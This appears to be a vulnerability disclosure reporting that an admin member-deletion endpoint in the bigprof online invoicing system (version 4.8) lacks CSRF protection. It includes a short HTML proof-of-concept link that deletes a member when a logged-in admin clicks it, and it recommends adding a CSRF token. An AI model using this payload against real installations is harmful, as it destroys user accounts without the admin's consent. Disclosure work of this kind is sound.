Cross-Site Request Forgery (CSRF) in bigprof-software/online-invoicing-system
Jun 27th 2021
/app/admin/pageDeleteMember.php?memberID=<x> does not have a CSRF protection. This could be used by attackers to trick the admin to delete a member from their invoice system.
🕵️♂️ Proof of Concept
For this attack to work, a logged in admin, should visit the POC page.
<html> <body> <a href="http://<host>/online-invoicing-system-4.8/app/admin/pageDeleteMember.php?memberID=<account_id>">Click Here !</a> </body> </html>
When a logged in user clicks the link a member is deleted.
This vulnerability is capable of deleting members from the platform.
Introduce a CSRF token in the request.